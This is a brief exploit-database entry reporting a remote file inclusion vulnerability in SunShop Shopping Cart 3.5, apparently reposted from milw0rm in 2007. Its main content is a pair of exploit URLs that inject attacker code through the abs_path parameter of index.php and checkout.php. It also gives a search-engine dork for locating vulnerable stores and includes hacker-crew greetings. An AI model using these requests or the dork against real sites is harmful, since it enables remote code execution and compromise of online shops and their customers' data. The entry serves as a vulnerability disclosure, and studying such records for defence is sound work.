SunShop Shopping Cart 3.5 - abs_path Remote File Inclusion

2007-04-16T00:00:00
ID EXPLOITPACK:5748A2A41E4A478B8E8FBDDDEC6C4C8B
Type exploitpack
Reporter irvian
Modified 2007-04-16T00:00:00

Description

SunShop Shopping Cart 3.5 - abs_path Remote File Inclusion

                                        
                                            sunshop 4 (index.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts       : SunShop v3.5
# Discovered By : irvian
# scripts site  : http://www.turnkeywebtools.com/sunshop/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork          : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:

Exploit: www.target.com/index.php?abs_path=[evilcode]
         www.target.com/checkout.php?abs_path=[evilcode]

# milw0rm.com [2007-04-16]